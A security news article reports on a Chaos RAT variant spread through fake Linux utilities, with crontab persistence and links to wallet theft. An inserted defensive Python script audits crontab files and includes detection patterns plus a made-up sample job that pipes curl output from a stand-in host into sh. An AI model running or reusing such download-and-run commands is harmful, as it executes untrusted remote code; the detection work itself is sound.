New Chaos RAT Variant Targets Linux, Spreads via Fake Utilities

Chaos RAT Malware Targets Windows and Linux with Fake Network Tools and Cryptocurrency-Themed Attacks

  • A new version of Chaos RAT Malware is targeting both Windows and Linux systems.
  • The malware is spread through fake network tools and phishing emails, often disguised as Linux troubleshooting utilities.
  • Chaos RAT gives attackers remote access, file management, and control over infected devices.
  • Recent campaigns show connections with cryptocurrency mining activities and theft of wallet credentials.
  • Security flaws in the malware’s admin panel have been fixed as of May 2024.

A recent wave of cyber attacks is deploying an updated variant of the malware known as Chaos RAT, impacting both Windows and Linux operating systems. Researchers have found that attackers use deceptive network utility downloads and phishing emails to distribute the malware, particularly targeting Linux users.

Experts from Acronis revealed that Chaos RAT is an open-source remote access tool written in Go, supporting cross-platform deployment. Attackers often trick victims into downloading files disguised as helpful network tools, which in reality install the malware. Once on a system, Chaos RAT connects to an external server, enabling functions like launching remote command shells, managing files, collecting system information, and even shutting down or restarting machines. The latest observed version is 5.0.3, released May 31, 2024.

The Acronis research team stated, “Chaos RAT provides an administrative panel where users can build payloads, establish sessions, and control compromised machines.” They reported that Chaos RAT is used in cryptocurrency mining campaigns, with attacks distributing the malware through phishing links or attachments, and achieving persistence by modifying scheduled task files (such as “/etc/crontab” in Linux). The initial campaigns delivered both Chaos RAT and a separate cryptocurrency miner, showing that Chaos RAT was also used for gathering information about devices.
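A defender-side check for the crontab persistence described above, as an added example that is not part of the original article or the Acronis report: it parses a system crontab and flags jobs that match a few heuristics. The heuristics, the function name `audit_crontab` and the sample entries are assumptions constructed for illustration.

```python
import re

# Heuristics are assumptions for illustration, not indicators from the Acronis report.
SUSPICIOUS = {
    "download-and-run": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|da|z)?sh\b"),
    "world-writable-path": re.compile(r"(^|[\s;&|])(/tmp|/var/tmp|/dev/shm)/"),
    "inline-decode": re.compile(r"\bbase64\b.*(-d|--decode)\b"),
}
# System crontab format: five time fields (or an @keyword), then user, then command.
SCHEDULE = re.compile(r"^(@\w+|(\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$")
ENV = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

# Constructed sample in /etc/crontab format; the last two jobs are made up.
SAMPLE = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }
*/5 * * * * root /tmp/.cache-x/agent >/dev/null 2>&1
@reboot root curl -fsSL http://example.invalid/u | sh
"""

def audit_crontab(text):
    """Return (line_no, user, command, reasons) for each flagged job."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        # Skip blanks, comments and environment assignments such as PATH=...
        if not line or line.startswith("#") or ENV.match(line):
            continue
        m = SCHEDULE.match(line)
        if not m:
            continue
        cmd = m.group("cmd")
        reasons = [name for name, rx in SUSPICIOUS.items() if rx.search(cmd)]
        if reasons:
            findings.append((no, m.group("user"), cmd, reasons))
    return findings

if __name__ == "__main__":
    for no, user, cmd, reasons in audit_crontab(SAMPLE):
        print(f"line {no} ({user}): {cmd}  <- {', '.join(reasons)}")
```

On a real host, pass the contents of `/etc/crontab` and the files under `/etc/cron.d/`, and compare the result against a known-good baseline, since a match is only a lead for review.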

A sample uploaded to VirusTotal in January 2025 from India, titled “NetworkAnalyzer.tar.gz”, suggests attackers are disguising the malware as Linux troubleshooting tools to fool users. The management panel of Chaos RAT previously contained a high-severity vulnerability (CVE-2024-30850) that allowed command injection, as well as a cross-site scripting flaw (CVE-2024-31839). Both issues have now been fixed by the tool’s maintainer.

Researchers highlight that malicious actors use open-source malware like Chaos RAT because it can be quickly customized and makes it harder to determine who is behind attacks. They note that “using publicly available malware helps APT groups blend into the noise of everyday cybercrime,” complicating attribution attempts.

There is also evidence of ongoing campaigns attacking Trust Wallet users on desktop with fake wallets. These attacks are designed to collect browser credentials, extract data from crypto wallets, execute remote commands, and act as clipboard hijackers to steal sensitive information such as seed phrases and private keys. Details about this campaign were shared by Point Wild researcher Kedar S Pandit in a new report, noting the malware can monitor files, clipboard activity, and browser sessions to capture crypto asset details.
